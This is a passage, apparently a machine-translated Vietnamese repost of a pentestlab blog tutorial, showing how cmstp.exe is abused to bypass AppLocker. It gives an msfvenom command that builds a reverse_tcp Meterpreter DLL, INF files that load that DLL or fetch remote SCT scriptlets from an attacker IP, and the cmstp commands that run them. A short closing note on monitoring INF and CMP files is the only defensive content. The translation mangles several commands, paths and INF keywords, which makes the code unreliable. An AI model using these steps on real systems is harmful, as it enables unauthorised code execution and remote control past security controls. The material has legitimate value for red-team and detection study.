CMSTP là một tệp nhị phân được liên kết với Trình cài đặt Hồ sơ Trình quản lý Kết nối Microsoft. Nó chấp nhận các tệp INF có thể được vũ khí hóa bằng các lệnh độc hại để thực thi mã tùy ý dưới dạng tập lệnh (SCT) và DLL. Nó là một nhị phân Microsoft đáng tin cậy nằm trong hai thư mục Windows sau đây.

C:  Windows  System32  cmstp.exe
C:  Windows  SysWOW64  cmstp.exe

Quy tắc mặc định của AppLocker cho phép thực thi các tệp nhị phân trong các thư mục này do đó nó có thể được sử dụng làm phương thức bỏ qua. Ban đầu Oddvar Moe phát hiện ra rằng có thể sử dụng nhị phân này để vượt qua AppLocker và UAC và xuất bản nghiên cứu của mình trên blog của mình .

DLL

Metasploit Framework có thể được sử dụng để tạo ra các tệp DLL độc hại thông qua msfvenom.

msfvenom -p windows / x64 / meterpreter / reverse_tcp LHOST = 10.0.0.2 LPORT = 4444 -f dll & amp; gt; /root/Desktop/pentestlab.dll
 Metasploit - Thế hệ DLL

Metasploit – Thế hệ DLL

RegisterOCXSection của tệp INF cần bao gồm đường dẫn cục bộ của tệp DLL độc hại hoặc vị trí WebDAV để thực thi từ xa.

[version]
Chữ ký = $ chicago $
AdvancedINF = 2,5

[DefaultInstall_SingleUser]
RegisterOCXs = RegisterOCXSection

[RegisterOCXSection]
C:  Users  test.PENTESTLAB  pentestlab.dll

[Strings]
AppAct = "PHẦN MỀM  Microsoft  Trình quản lý kết nối"
ServiceName = "Pentestlab"
ShortSvcName = "Pentestlab"
 CMSTP - Thi hành DLL cục bộ

CMSTP – Thi hành DLL cục bộ

Metasploit multi / handler module cần được cấu hình để nhận kết nối.

 CMSTP - Bộ xử lý đa Metasploit

CMSTP – Bộ xử lý đa Metasploit

Khi tệp INF độc hại được cung cấp cùng với cmstp, mã sẽ được thực hiện trên nền.

cmstp.exe / s cmstp.inf
 CMSTP - Thực thi INF cục bộ

CMSTP – Thực thi INF tại địa phương

Một phiên Meterpreter sẽ mở ra từ việc thực thi DLL.

 CMSTP - Meterpreter thông qua thực thi DLL

CMSTP – Meterpreter thông qua thực thi DLL

SCT

Ngoại trừ các tệp DLL cmstp cũng có thể chạy các tệp SCT mở rộng khả năng sử dụng của nhị phân này trong các hoạt động của nhóm màu đỏ. Nick Tyrer ban đầu đã trình bày khả năng này qua Twitter .

Nick Tyrer cũng đã viết một tập lệnh gọi là powersct.sct có thể được sử dụng làm giải pháp thay thế để thực thi lệnh PowerShell trong trường hợp bị chặn PowerShell gốc. UnRegisterOCXSection cần chứa URL của tập lệnh. Tệp INF cuối cùng cần chứa các thông tin sau:

[version]
Chữ ký = $ chicago $
AdvancedINF = 2,5

[DefaultInstall_SingleUser]
UnRegisterOCXs = UnRegisterOCXSection

[UnRegisterOCXSection]
% 11%  scrobj.dll, NI, http: //10.0.0.2/tmp/powersct.sct

[Strings]
AppAct = "PHẦN MỀM  Microsoft  Trình quản lý kết nối"
ServiceName = "Pentestlab"
ShortSvcName = "Pentestlab"

Khi tệp INF sẽ thực hiện một Cửa sổ mới sẽ mở ra sẽ cho phép người dùng thực thi các lệnh PowerShell.

cmstp.exe / s cmstp.inf
 CMSTP - PowerShell

CMSTP – PowerShell

Việc thực thi mã cũng có thể thông qua việc sử dụng tập lệnh sẽ gọi một tệp thực thi độc hại. Tệp INF cần bao gồm vị trí từ xa của tập lệnh.

[version]
Chữ ký = $ chicago $
AdvancedINF = 2,5

[DefaultInstall_SingleUser]
UnRegisterOCXs = UnRegisterOCXSection

[UnRegisterOCXSection]
% 11%  scrobj.dll, NI, http: //10.0.0.2/tmp/pentestlab.sct

[Strings]
AppAct = "PHẦN MỀM  Microsoft  Trình quản lý kết nối"
ServiceName = "Pentestlab"
ShortSvcName = "Pentestlab"
 CMSTP - Thi hành SCT

CMSTP – Thi hành SCT

Sau khi thực thi tệp INF, cửa sổ nhắc lệnh mới sẽ mở ra, nó sẽ là dấu hiệu cho biết mã đã được thực thi thành công.

 CMSTP - Thực thi INF với tập lệnh

CMSTP – Thực thi INF với tập lệnh

Một phiên họp Meterpreter sẽ mở.

 CMSTP - Meterpreter thông qua thực thi SCT

CMSTP – Meterpreter thông qua thực thi SCT

Kết luận

Việc sử dụng nhị phân CMSTP để bỏ qua các hạn chế của AppLocker và việc thực thi mã là. CMSTP cần tệp INF và khi thực thi tạo và tệp CMP là tệp cài đặt trình quản lý kết nối. Cả hai tệp này đều thực sự là tệp văn bản và không có khả năng kích hoạt bất kỳ cảnh báo nào. Do đó hai tệp này cần được giám sát như một chỉ báo về sự thỏa hiệp nếu nhị phân cmstp.exe không thể bị chặn bởi quy tắc AppLocker vì [194590028] các tác nhân đe dọa đã bắt đầu sử dụng kỹ thuật này.

 CMSTP - Tệp INF và CMP

CMSTP – Tệp INF và CMP

Tài nguyên



nguồn
(https://pentestlab.blog/2018/05/10/applocker-bypass-cmstp/)

Source link

Đưa ra một phản hồi

Vui lòng nhập bình luận của bạn!
Vui lòng nhập tên của bạn ở đây